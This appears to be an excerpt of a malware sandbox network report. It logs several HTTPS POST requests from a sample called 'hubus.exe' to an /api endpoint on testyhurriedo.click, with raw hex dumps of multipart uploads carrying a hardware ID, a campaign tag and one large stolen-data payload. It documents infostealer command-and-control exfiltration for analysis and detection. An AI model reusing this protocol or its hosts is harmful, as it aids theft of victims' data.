                                                                                                                                                                                                                                                            2024-12-19 23:58:36 UTC10909OUTData Raw: 2d 2d 32 37 36 5a 42 42 4f 42 42 30 55 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 33 33 31 41 38 42 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 32 37 36 5a 42 42 4f 42 42 30 55 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 37 36 5a 42 42 4f 42 42 30 55 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 32 37 36 5a 42 42 4f 42 42 30
                                                                                                                                                                                                                                                            Data Ascii: --276ZBBOBB0UYYContent-Disposition: form-data; name="hwid"A4331A8BB129FD4CDB71E32F12885CB3--276ZBBOBB0UYYContent-Disposition: form-data; name="pid"2--276ZBBOBB0UYYContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--276ZBBOBB0
                                                                                                                                                                                                                                                            2024-12-19 23:58:36 UTC1139INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:36 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=5notlv8bgo6j6340ocajkgku49; expires=Mon, 14 Apr 2025 17:45:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O96By%2B1dKBDDLeMrFool0ycO3zmwqeQhuM0aDvj8l49D16UK1RNlknhf0Bow%2BLp%2BnlqXYcB0AL9Hvvs1zXo22jW0rdA%2B%2Bn6hWV87moEUorRFa4d2BvzhjF%2BSMwQczqOUOmfZvzlw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f4b57759b2332ef-JAX
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=135430&min_rtt=135359&rtt_var=28623&sent=10&recv=16&lost=0&retrans=0&sent_bytes=2849&recv_bytes=11847&delivery_rate=28252&cwnd=252&unsent_bytes=0&cid=7f598cd5ec40e8f6&ts=641&x=0"
                                                                                                                                                                                                                                                            2024-12-19 23:58:36 UTC24INData Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 12ok 102.129.152.205
                                                                                                                                                                                                                                                            2024-12-19 23:58:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            11192.168.11.2049763104.21.112.14434780C:\Users\user\Desktop\hubus.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-19 23:58:37 UTC285OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=1ZYKC004NNJH2LY1J1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 20568
                                                                                                                                                                                                                                                            Host: testyhurriedo.click
                                                                                                                                                                                                                                                            2024-12-19 23:58:37 UTC15331OUTData Raw: 2d 2d 31 5a 59 4b 43 30 30 34 4e 4e 4a 48 32 4c 59 31 4a 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 33 33 31 41 38 42 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 31 5a 59 4b 43 30 30 34 4e 4e 4a 48 32 4c 59 31 4a 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 31 5a 59 4b 43 30 30 34 4e 4e 4a 48 32 4c 59 31 4a 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c
                                                                                                                                                                                                                                                            Data Ascii: --1ZYKC004NNJH2LY1J1Content-Disposition: form-data; name="hwid"A4331A8BB129FD4CDB71E32F12885CB3--1ZYKC004NNJH2LY1J1Content-Disposition: form-data; name="pid"3--1ZYKC004NNJH2LY1J1Content-Disposition: form-data; name="lid"jMw1IE--SHELL
                                                                                                                                                                                                                                                            2024-12-19 23:58:37 UTC5237OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 4d d1 61 7a dd 77 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 5c 6f 74 98 5e f7 dd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a b7 29 3a 4c af fb 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d eb 8d 0e d3 eb be 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 36 45 87 e9 75 df 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 bd d1 61 7a dd 77 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: Mazw\ot^:):Ln`X6Eusazw
                                                                                                                                                                                                                                                            2024-12-19 23:58:37 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=otntc6rbhmandecob91kness75; expires=Mon, 14 Apr 2025 17:45:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g0QiLvwsCKZ%2BjPzSEIh2B3TrVkF7QUSnpiRlpVTV5jhScL2BQCNy2XEvaq0M95oaSY8fG1YQKpSVdy%2BbozMqns%2BW9kuDhY960PKMBuhRxwPW47vpkMn%2FccJyXERQAY983rXkkXZN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f4b577bba1832e1-JAX
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=135231&min_rtt=135109&rtt_var=28703&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2848&recv_bytes=21533&delivery_rate=28244&cwnd=252&unsent_bytes=0&cid=051d03c38d7cb8fc&ts=608&x=0"
                                                                                                                                                                                                                                                            2024-12-19 23:58:37 UTC24INData Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 12ok 102.129.152.205
                                                                                                                                                                                                                                                            2024-12-19 23:58:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            12192.168.11.2049764104.21.112.14434780C:\Users\user\Desktop\hubus.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-19 23:58:38 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=183MKCYFFJLTGU3A
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 1264
                                                                                                                                                                                                                                                            Host: testyhurriedo.click
                                                                                                                                                                                                                                                            2024-12-19 23:58:38 UTC1264OUTData Raw: 2d 2d 31 38 33 4d 4b 43 59 46 46 4a 4c 54 47 55 33 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 33 33 31 41 38 42 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 31 38 33 4d 4b 43 59 46 46 4a 4c 54 47 55 33 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 38 33 4d 4b 43 59 46 46 4a 4c 54 47 55 33 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 31
                                                                                                                                                                                                                                                            Data Ascii: --183MKCYFFJLTGU3AContent-Disposition: form-data; name="hwid"A4331A8BB129FD4CDB71E32F12885CB3--183MKCYFFJLTGU3AContent-Disposition: form-data; name="pid"1--183MKCYFFJLTGU3AContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--1
                                                                                                                                                                                                                                                            2024-12-19 23:58:38 UTC1136INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=h6o5tuksg6tkoh9k02eprtmc3m; expires=Mon, 14 Apr 2025 17:45:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kLvOk10sg2f9NV1L%2B4hxTs8%2BkcoOr1Bz%2B25lmHarpYmXlRdGKy9PomoXsdazCI20ldlMn9ycJJf5BD%2FCEtii7vdUVjCgGeVdSSQmc3%2FGDobPWiYJz1XbkhDcrA%2BcrI9ivQjrSnJL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f4b5781bbc132f8-JAX
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=134972&min_rtt=134674&rtt_var=28555&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2848&recv_bytes=2182&delivery_rate=28391&cwnd=252&unsent_bytes=0&cid=75017b62af6dc914&ts=543&x=0"
                                                                                                                                                                                                                                                            2024-12-19 23:58:38 UTC24INData Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 12ok 102.129.152.205
                                                                                                                                                                                                                                                            2024-12-19 23:58:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            13192.168.11.2049765104.21.112.14434780C:\Users\user\Desktop\hubus.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-19 23:58:39 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=0U6W4TDPD
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 1066431
                                                                                                                                                                                                                                                            Host: testyhurriedo.click
                                                                                                                                                                                                                                                            2024-12-19 23:58:39 UTC15331OUTData Raw: 2d 2d 30 55 36 57 34 54 44 50 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 33 33 31 41 38 42 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 30 55 36 57 34 54 44 50 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 55 36 57 34 54 44 50 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 30 55 36 57 34 54 44 50 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                                                                                                                                                                                                            Data Ascii: --0U6W4TDPDContent-Disposition: form-data; name="hwid"A4331A8BB129FD4CDB71E32F12885CB3--0U6W4TDPDContent-Disposition: form-data; name="pid"1--0U6W4TDPDContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--0U6W4TDPDContent-Dis
                                                                                                                                                                                                                                                            2024-12-19 23:58:39 UTC15331OUTData Raw: 8e c6 cd f5 67 8e 3b 9d 09 bf 04 03 71 32 01 9a fa 1c 74 9d 23 aa 69 58 c0 42 66 26 73 e7 fd 86 26 25 3f 63 b9 a0 fb 02 bf f2 0f 01 22 09 8a 33 aa e5 f3 31 40 38 de d2 79 e6 48 48 62 2b be b0 d7 89 5d 62 5f 99 c9 15 9f 65 0f 3c 43 8e d8 14 8a c5 7b 7d 92 b5 aa 07 b0 5b 0b 35 24 be 14 5d 59 04 88 93 51 9d 66 ee 44 3b 5e 33 63 ce 48 52 7d f5 ed 6a 79 8a 7d 8b 97 a2 5c 5c 29 52 c4 3d 0e 48 87 a7 60 64 46 75 bb 06 fb d4 86 a7 76 9f e2 a7 7c 2d f8 0c 24 74 15 31 6e 8f f1 f8 d2 28 33 89 ac 5b 7e 80 1d 77 ca 56 77 1d e0 e3 e8 c9 22 55 58 35 e2 ee 91 80 dd 27 b0 d9 56 ce 05 ff de 5d 37 27 0d ca 44 05 e0 12 5c d3 3e dd 2b 47 1a 32 8c 26 bc de e8 ba ad 10 f6 0b 72 a5 37 9d 15 13 c3 11 16 87 73 04 8a f4 fb 5f 29 ec d5 24 e0 d9 6a 11 6f f4 3d e6 d1 03 6d 49 fe 0b 49
                                                                                                                                                                                                                                                            Data Ascii: g;q2t#iXBf&s&%?c"31@8yHHb+]b_e<C{}[5$]YQfD;^3cHR}jy}\\)R=H`dFuv|-$t1n(3[~wVw"UX5'V]7'D\>+G2&r7s_)$jo=mII
                                                                                                                                                                                                                                                            2024-12-19 23:58:39 UTC15331OUTData Raw: 19 a7 f5 56 bb e5 41 43 68 dc 23 8f 3c 36 2a b4 e9 2c 43 2c 1e ad 8a 7b 58 74 af d4 b3 4a 22 13 f2 af f9 29 f1 07 dd c3 84 aa 7b 17 32 a7 1c 0e a7 78 b9 0d 8e 8f 62 02 c6 17 86 b7 f1 53 6a e5 39 10 98 68 f3 89 00 6e a7 3b 2d b5 21 e2 18 3d 89 58 3d 1d ad 1e a3 fe 4f d1 8a e7 5c ab 24 68 a7 f7 a0 0b 71 c4 32 ce 19 c4 e3 69 6a 2c 3b 7a 36 38 35 96 92 09 e6 71 3d 49 7c 41 84 b8 0f 8b 8a 0c 6a a5 b5 d6 be c1 95 6b 76 d4 a9 14 58 f2 a7 ed 88 3d f5 fd cb 48 1e 58 db e6 e8 2a 9e 1a 93 33 f1 5c 63 77 4e 94 7b b9 60 24 7a 66 ce ee 5c e5 de 8c 4e 70 a6 84 d7 7b ca 2a 5d d6 3c 2c f0 32 7b 13 72 e3 92 53 5a cb e5 b2 2f d2 ae 62 51 c9 cb 85 27 fb 04 ba c1 95 99 8b f2 f9 5c a9 12 45 07 2b 8d 7b 6b 3c 67 b4 00 d9 4b 43 38 32 a7 88 af d2 92 ff 91 2d 78 cc 1c 15 7e d3 fd
                                                                                                                                                                                                                                                            Data Ascii: VACh#<6*,C,{XtJ"){2xbSj9hn;-!=X=O\$hq2ij,;z685q=I|AjkvX=HX*3\cwN{`$zf\Np{*]<,2{rSZ/bQ'\E+{k<gKC82-x~
                                                                                                                                                                                                                                                            2024-12-19 23:58:39 UTC15331OUTData Raw: e5 e6 96 0b 17 ec 0f ee cc 3a 2d 72 b5 ad 11 57 27 78 be 6c d7 94 71 bf 64 f1 98 4e 38 0f b5 9c f1 2e 4f ff 2e e3 7b 7c cf d4 74 52 0c f9 b6 90 21 15 03 1b c1 37 26 f3 10 65 a0 f1 07 81 68 2d 2e da ca 47 07 15 c9 89 b3 18 43 61 5a 05 7b d7 d1 16 56 0a 6a 7f db 8f 37 b2 ae 99 35 6f dd f6 67 e9 2a c8 b7 ce fb db 96 6d c4 53 19 65 76 50 ff ad cd 27 75 5b 3b f3 0e 61 e3 d4 95 e7 0e 51 cb 54 8b 81 22 0f 3f ab 2c d8 b1 c3 83 37 f4 91 b7 c0 93 03 76 d7 fc 6b 2d d7 6f d4 d9 c0 5b 98 25 58 cb 01 ef 4b ab b3 b6 ca 03 8a 0a 7e 8e 6b a6 81 be 52 ce 94 29 06 da 17 5d 27 f3 4f d8 7a 33 6c de 3b ff ca fa 2c d5 b9 c4 52 ed e0 c6 ad 72 c1 68 89 ca a0 15 ab fd 7d 3f a4 41 eb 4d a0 85 69 00 9b 2b 7b d3 7f 23 5b 8f 62 53 22 bd b5 e9 0e 9c 51 f6 f0 7b 1d fb 7a 70 56 22 e6 e3
                                                                                                                                                                                                                                                            Data Ascii: :-rW'xlqdN8.O.{|tR!7&eh-.GCaZ{Vj75og*mSevP'u[;aQT"?,7vk-o[%XK~kR)]'Oz3l;,Rrh}?AMi+{#[bS"Q{zpV"
                                                                                                                                                                                                                                                            2024-12-19 23:58:39 UTC15331OUTData Raw: 06 5e c0 13 45 01 48 31 ea e8 98 aa 7c 54 9f f4 1a 28 ba a3 ca 81 a8 66 e9 89 35 40 25 5f f4 f1 72 96 f7 62 72 45 b6 47 ec 0f 76 51 7b 87 a0 5c 01 60 9c 43 3a 51 8b c5 bd 2f 88 87 3e e7 47 9e c3 79 4e 6f 05 f0 62 7b 52 28 56 36 ab 1f 85 e1 04 57 66 23 bf a9 31 06 e0 87 bf fe 8b f1 f6 b1 69 3f 85 8b 8c 1d d3 78 bd de 0e 78 ef 37 2c 2f 41 ed 27 fb 42 42 4f 8e 57 3d a6 95 21 41 04 a7 93 f3 c5 1b 42 5e 72 2b 96 e4 02 58 04 d1 f4 74 f1 31 7a 70 0c 88 63 11 40 fb 7a e6 1e a6 43 b7 db 97 ad ae 0d e4 09 d2 54 55 5c 21 7c eb b2 02 66 e6 75 2c b2 35 c4 6f b3 70 ce e5 b5 e1 12 14 45 ad 78 00 e6 79 11 72 33 a5 9b 95 83 d4 aa 54 08 35 2b 6f 10 f8 cc 1e 71 0e f8 91 a4 6e 1f 74 93 20 a4 b3 d0 a3 cb a9 59 e7 8e 16 ee a9 6c 8f 9a 88 ba 95 f8 0f ec d0 d9 3a 62 e7 85 96 b7
                                                                                                                                                                                                                                                            Data Ascii: ^EH1|T(f5@%_rbrEGvQ{\`C:Q/>GyNob{R(V6Wf#1i?xx7,/A'BBOW=!AB^r+Xt1zpc@zCTU\!|fu,5opExyr3T5+oqnt Yl:b
                                                                                                                                                                                                                                                            2024-12-19 23:58:39 UTC15331OUTData Raw: 21 1d 52 e6 c7 29 c9 76 1a f5 d0 c1 f6 c5 bb 35 a2 9d ea 87 ac 10 41 d5 b1 dc 77 91 ea 84 cf 56 a2 4c 85 c9 77 dd 58 a9 7b d5 4f 05 39 fe cd a7 ee 61 3a 72 8a dd 95 b6 1a 9c 6f fb 88 58 8b 74 be cb eb e0 21 5b c6 f3 ee b2 97 93 0e 80 ee c8 eb 1d cb 5e 51 ab 8a a3 66 41 85 37 a3 05 82 03 a4 bd fb 04 75 f3 88 11 0d eb ef 8b 72 9c b4 bd 82 f4 8f 73 6e 9a 23 45 50 fd fc ba b5 bd 6d 5e 46 b1 f0 2a 2a 6a 22 84 25 2a 4c 14 1a c6 87 ac 2d 05 42 48 82 6e ed bb 83 08 4f 71 19 23 17 98 5f be f6 63 a7 83 06 35 5f 52 53 1a 04 b6 5b d1 45 5f 9d ba b2 9c bb da 5c 5f 86 ca 86 ba f5 b9 bf 68 4e bc d6 5d 78 cb 4c 91 92 b9 82 30 a3 ff e5 ce 4f 5d cc 30 a6 ae 0c 01 a1 10 d3 a2 f3 df de e5 c4 cd 47 bd 12 3b 0f 8c b4 e5 e0 c7 d6 b2 ec 99 b3 af d3 1d 87 a6 d4 98 42 86 4b 1a c9
                                                                                                                                                                                                                                                            Data Ascii: !R)v5AwVLwX{O9a:roXt![^QfA7ursn#EPm^F**j"%*L-BHnOq#_c5_RS[E_\_hN]xL0O]0G;BK
                                                                                                                                                                                                                                                            2024-12-19 23:58:39 UTC15331OUTData Raw: 45 ee 20 60 33 b9 5d f1 bf 2d 3b b5 00 2b 65 f9 bc 51 92 9a 26 0f 01 70 61 ad 0d b7 e7 eb 66 ba f6 c5 84 37 2d bf 6c 9e 72 d8 17 28 88 e5 bf ac 68 1c 4e d0 6a 4c 70 86 4b 8e 1b dd 4f b5 69 24 b6 a0 b9 fa ee 56 f3 b9 3f be 66 2a 68 04 00 4d 51 62 00 53 6d 8b 8b 39 fb 5f 03 25 10 88 25 5b 10 76 80 4f c7 fc d1 2d 21 09 08 89 63 6e 4b ea bd 00 61 87 35 30 b6 8f 8a 7f 03 09 1d 85 59 95 2a d7 5d 28 18 17 b9 4b 10 96 cc 99 06 28 63 48 a8 6c c2 0e 31 40 9c 4e 83 b6 c5 fd d9 8d fb b5 6a fc 1f 95 4f 86 43 20 ae 5f 3e 1d 0e 45 10 2e b5 4d a8 01 91 bd bd 84 6b 74 d8 62 e1 01 15 09 f2 9f dd 71 f2 66 96 89 46 d2 0d 75 f1 ea 51 c3 e6 91 1e ec a0 36 a4 06 35 4e 9f 99 dd ed 08 a2 06 c9 37 81 65 95 3b 69 a9 b8 6d 3f 09 b2 23 33 b9 c6 32 23 24 53 19 92 c3 af 15 a7 22 48 0d
                                                                                                                                                                                                                                                            Data Ascii: E `3]-;+eQ&paf7-lr(hNjLpKOi$V?f*hMQbSm9_%%[vO-!cnKa50Y*](K(cHl1@NjOC _>E.MktbqfFuQ65N7e;im?#32#$S"H
                                                                                                                                                                                                                                                            2024-12-19 23:58:39 UTC15331OUTData Raw: 4d a6 fe ae 8d 43 92 67 86 43 c9 a6 8f 55 18 06 98 33 a7 43 d8 e3 ad ac 5c 33 16 47 ce b9 21 1e 52 e7 e5 89 85 47 e2 a4 8b 76 71 8f 55 1c 78 fd 30 81 ee 53 36 ef 22 61 48 30 15 25 ec 94 f3 d1 34 bc 98 f1 96 aa 62 06 ce 59 b7 e5 fe 9f 85 37 30 c0 46 1a c2 8f 0f f8 33 c1 04 4c 6e 46 55 47 a8 cc 64 2f 05 95 a6 7b 34 7c dd 13 43 15 20 f5 80 6b d0 3a 0a f6 c0 20 b6 ce 7f b6 e9 ee 83 d2 ba db 6d c0 44 28 24 32 98 29 be 2b f2 81 19 9a 24 7a f5 10 ca b4 48 8c 69 66 46 fe 1f 48 fb 28 1c b0 ea de bf f1 9b 04 75 89 96 25 41 50 25 bd 8e 26 ac fe 80 fe e7 50 e7 7d 9e e0 7f 4a 65 6f b6 88 fa 21 9e f5 91 42 27 70 62 f4 94 08 db 31 90 33 0d 54 08 a1 f1 b3 6b 20 3b 7f fb c9 1b f5 8d 21 d2 e1 dc 08 4e 80 f0 8f ca 6e 58 17 c2 a9 e7 24 40 40 c9 ad ed c3 c9 30 83 46 a9 9d f3
                                                                                                                                                                                                                                                            Data Ascii: MCgCU3C\3G!RGvqUx0S6"aH0%4bY70F3LnFUGd/{4|C k: mD($2)+$zHifFH(u%AP%&P}Jeo!B'pb13Tk ;!NnX$@@0F
